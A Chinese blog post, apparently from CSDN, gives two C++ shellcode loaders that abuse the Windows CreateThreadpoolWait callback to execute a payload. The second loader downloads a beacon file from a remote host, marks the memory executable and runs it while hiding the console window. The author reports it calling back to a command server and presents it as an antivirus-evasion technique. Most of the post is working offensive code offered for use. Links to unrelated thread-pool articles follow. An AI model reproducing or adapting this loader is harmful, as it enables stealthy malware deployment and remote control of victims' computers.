线程池等待对象回调函数执行(CreateThreadpoolWait)

于 2023-08-28 21:44:11 发布
阅读量428 收藏
点赞数
文章标签: 网络安全 c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/bring_coco/article/details/132548954
版权

最初始的模板

#include <stdio.h>
#include <Windows.h>
 
int main() {
    unsigned char buf[] = "shellcode";
 
    /*
    * VirtualProtect是Windows API,用于修改内存访问权限
    * 参数1:指向内存的指针
    * 参数2:内存大小(以字节为单位)
    * 参数3:新的访问权限
    * 参数4:用于接收修改前的访问权限,NULL表示不需要接受(但是会出错)
    */
    DWORD oldProtect;
    VirtualProtect((LPVOID)buf, sizeof(buf), PAGE_EXECUTE_READWRITE, &oldProtect); // shellcode内存后修改为可读可写可执行
 
    /*
    * CreateEvent是Windows API,用于创建一个事件对象
    * 参数1:安全属性,NULL表示默认
    * 参数2:是否手动复位
    * 参数3:TRUE表示事件对象的初始状态为有信号状态,否则为无信号状态
    * 参数4:事件名称,NULL表示不使用名称
    */
    HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
    /*
    * CreateThreadpoolWait是Windows API,用于创建一个线程池等待对象
    * 参数1:回调函数指针
    * 参数2:回调函数参数
    * 参数3:线程池回调环境
    */
    PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)(LPVOID)buf, NULL, NULL);
    /*
    * SetThreadpoolWait是Windows API,用于向线程池中添加等待对象
    * 参数1:线程池等待对象
    * 参数2:要等待的内核对象句柄
    * 参数3:等待超时时间,NULL表示无限等待
    */
    SetThreadpoolWait(threadPoolWait, event, NULL);
    WaitForSingleObject(event, INFINITE); // 等待事件对象执行完毕(状态变为无信号),事件对象执行会执行回调函数buf
    return 0;
}

然后我们写成远程加载的方式

#include <stdio.h>
#include <Windows.h>
#include <WinInet.h>
#include <string>

#pragma comment(lib,"wininet")
#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"")

using namespace std;

int main() {
    unsigned char buf[] = "shellcode";

    void* exec;
    int payload_len = 280000;   //shellcode大小  

    wchar_t host[] = L"xx.xx.xx.xx";   //远程下载的主机的ip
    WORD port = 8000;   //端口
    wchar_t path[] = L"/beacon811.bin";   //对应的文件

    HINTERNET session;
    HINTERNET conn;
    HINTERNET reqfile;
    DWORD nread;

    exec = VirtualAlloc(0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);   //申请内存

    //使用默认设置创建会话
    session = InternetOpen(L"Mozilla/4.0", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);

    //连接到目标主机
    conn = InternetConnect(session, host, port, L"", L"", INTERNET_SERVICE_HTTP, 0, 0);

    //创建请求
    reqfile = HttpOpenRequest(conn, L"GET", path, NULL, NULL, NULL, 0, 0);

    //发送请求并读取响应
    HttpSendRequest(reqfile, NULL, 0, 0, 0);
    InternetReadFile(reqfile, exec, payload_len, &nread);

    std::string Content(reinterpret_cast<const char*>(exec), nread);

    /*
    * VirtualProtect是Windows API,用于修改内存访问权限
    * 参数1:指向内存的指针
    * 参数2:内存大小(以字节为单位)
    * 参数3:新的访问权限
    * 参数4:用于接收修改前的访问权限,NULL表示不需要接受(但是会出错)
    */
    DWORD oldProtect;
    VirtualProtect((LPVOID)Content.c_str(), Content.size(), PAGE_EXECUTE_READWRITE, &oldProtect); // shellcode内存后修改为可读可写可执行

    /*
    * CreateEvent是Windows API,用于创建一个事件对象
    * 参数1:安全属性,NULL表示默认
    * 参数2:是否手动复位
    * 参数3:TRUE表示事件对象的初始状态为有信号状态,否则为无信号状态
    * 参数4:事件名称,NULL表示不使用名称
    */
    HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
    /*
    * CreateThreadpoolWait是Windows API,用于创建一个线程池等待对象
    * 参数1:回调函数指针
    * 参数2:回调函数参数
    * 参数3:线程池回调环境
    */
    PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)(LPVOID)Content.c_str(), NULL, NULL);
    /*
    * SetThreadpoolWait是Windows API,用于向线程池中添加等待对象
    * 参数1:线程池等待对象
    * 参数2:要等待的内核对象句柄
    * 参数3:等待超时时间,NULL表示无限等待
    */
    SetThreadpoolWait(threadPoolWait, event, NULL);
    WaitForSingleObject(event, INFINITE); // 等待事件对象执行完毕(状态变为无信号),事件对象执行会执行回调函数buf
    return 0;
}

在这里插入图片描述
运行成功上线
需要单独使用的话套用811版本进行修改即可免杀

番茄酱料
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
win32练习 - CreateThreadpoolWait()
AlickXc的专栏
04-07 1259
#include "stdafx.h" #include #include #include HANDLE Event; PTP_WAIT pWaitItem; VOID CALLBACK WaitCallBack(PTP_CALLBACK_INSTANCE pInstance,PVOID Context,PTP_WAIT Wait,TP_WAIT_RESULT
【Windows核心编程笔记】第十一章 线程池的使用
半雨微凉
05-25 921
线程池开销并不小,所以使用之前先想好你是否真的需要它 以异步方式调用函数 定义函数:VOID NTAPI SimpleCallback(…….) TrySubmitThreadpoolCallback 让线程池中的线程执行该函数 考虑到性能和内存使用,如果大量提交,建议创建工作项一次,分多次提交 CreateThreadpoolWork 创建一个工作项 SubmitThre...
C#多线程——线程池回调函数
ssharet的博客
04-13 2289
也许你曾经遇到过:一个线程做事情,其他线程等待,那么有可能因为不做事情的线程在等待,而浪费掉时间。 我们可以通过线程池ThreadPool来解决,使用ThreadPool.QueueUserWorkItem(回调函数,object),将参数封装在一个类的对象中,传给回调函数执行。 TheadPool的用法: 1、创建一个ManualResetEvent的对象,就像一个信号灯,指
利用 Windows 线程池定制的 4 种方式完成任务(Windows 核心编程)
史D芬周
04-26 525
值得注意的是 WaitForThreadpoolTimerCallbacks 并不具有等待全部的线程池线程操作完成,所以我利用原子操作等待 Statistics 变为 5;SetThreadpoolTimer 的最后一个参数用于将多个计时器分为一组,这个参数用的比较少。来看看使用这个线程池需要哪些函数。
线程池内核对象触发调用函数
qq_39851127的博客
03-22 220
如果想注册一个工作项,等待一个内核对象被触发的时候去执行,与之前说过的步骤很相似,首先编写如下原型的函数: VOID CALLBACK KernelObjCallback( PTP_CALLBACK_INSTANCE pInstance, PVOID pvContext, PTP_WAIT pWait, TP_WAIT_RESULT WaitResult ); pWaitCreateThreadpoolWait函数返回的对象WaitResult是DWORD的值,可能的值是WAIT_OBJECT_0,WA
Java多线程实现回调函数.txt
12-10
Java多线程实现 自定义 的 回调函数. 手写 完成,亲测 完成,可以 直接运行,Demo ,具有一定参考价值,供大家阅读 下载,谢谢
python回调函数中使用多线程的方法
09-20
在Python中,回调函数是一种将函数作为参数传递给另一个函数的方式,并在这个被调用的函数内部执行该参数函数。这种方式使得我们可以更加灵活地控制程序流程,特别是在处理异步操作时。 多线程是指从软件或者硬件上...
delphi 回调函数示例
05-31
4. **定时器**:设置一个定时器并提供一个回调函数,当时间到达时执行该函数。 5. **遍历和过滤数据**:在处理数组或集合时,可以提供一个回调函数来确定每个元素是否应被包含。 回调函数的关键优势在于其灵活性和...
利用现成实现的回调函数
07-26
在编程领域,回调函数是一种常见的设计模式,它允许我们将一个函数作为参数传递给另一个函数,以便在特定条件满足时执行。在Delphi7这个古老的但依然强大的编程环境中,回调函数的使用可以极大地增强代码的灵活性和...
Java判断线程池线程是否执行完毕
08-19
Java判断线程池线程是否执行完毕 Java判断线程池线程是否执行完毕是Java多线程编程中的一种常见问题,当我们使用线程池执行多个任务时,需要判断所有的子线程是否已经执行完毕,以便进行后续操作。下面我们将介绍...
《Windows via C/C++》学习笔记 —— Windows 线程池
weixin_30819163的博客
08-25 238
  线程池(thread pool),允许有多个线程同时存在,并发执行,并且这些线程受到统一管理。   在Windows Vista中,提供了全新的线程池机制,一般这些线程池中的线程的创建的销毁是由操作系统自动完成的。   Windows Vista 中重新设计了线程池,提供了一组新的线程池API。因此,本篇讨论的仅仅在Windows Vista系统,或其以上的Windows版本中有效。 ...
Windows线程池
milanleon的专栏
07-17 4582
1、Windows提供了一个线程池机制来简化线程的创建、销毁以及日常管理
CreateThreadpoolIo 函数小记
aibulie0537的博客
03-11 569
函数原型如下: PTP_IO WINAPI CreateThreadpoolIo( _In_ HANDLE fl, _In_ PTP_WIN32_IO_CALLBACK pfnio, _Inout_opt_ PVOID pv, _In_opt_ PTP_CALLBACK_ENVIRON pcbe ); ...
《Windows核心编程系列》十一谈谈Windows线程池
系统运维
12-22 563
Windows线程池 上一篇博文我们介绍了IO完成端口。得知IO完成端口可以非常智能的分派线程。但是IO完成端口仅对等待它的线程进行分派,创建和销毁线程的工作仍然需要我们自己来做。 我们自己也可以创建线程,但是涉及到线程的编码操作比较复杂,容易出现差错。为了简化程序员的工作,Windows提供了一个线程池机制来简化线程的创建、销毁以及日常管理。这个新线程池可能不适用于所有的情况,但大...
线程池之在内核对象触发时调用一个对象
weixin_33932129的博客
06-28 203
步骤:   1、创建一个类似于void CALLBACK WaitCallBack(PTP_CALLBACK_INSTANCE pInstance,PVOID pvContext, PTP_WAIT pcbe,TP_WAIT_RESULT WaitResult)的函数   2、创建一个内核对象   3、CreateThreadpoolWait,创建等待   4、SetThreadpo...
Windows系统线程池+利用windows自带的线程池
老衣的专栏
09-07 2130
come from:http://www.fuzhijie.me/?p=65 一直想弄明白Windows的IO完成端口是什么,这个词语每每出现在我眼前时总是伴随着鲜花和赞美,因此我便将其同许多我从来没搞懂过的东西一起归为神秘一类。这两天一直在看《Windows核心编程》,学到了
线程池(VC_Win32)
u010246665的博客
03-20 635
线程池 (本章节中例子都是用 VS2010 编译调试的) 线程池编写必须在 Windows Vista 操作系统(以及以上版本的操作系统)下,且 C++ 编译器版本至少是 VS2008  线程池的功能 以异步的方式来调用一个函数每隔一段时间调用一个函数当内核对象触发的时候调用一个函数当异步 I/O 请求完成的时候调用一个函数 注意 当一个进程初始化的时候,它
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8385
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
java 线程池 final 对象回收
最新发布
07-16
对于线程池中的对象,当线程池不再引用这些对象时,它们可以被垃圾回收器回收。线程池中的对象包括线程、任务队列等。当线程池关闭时,它将不再使用这些对象,因此它们可以被回收。 需要注意的是,线程池中的任务...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值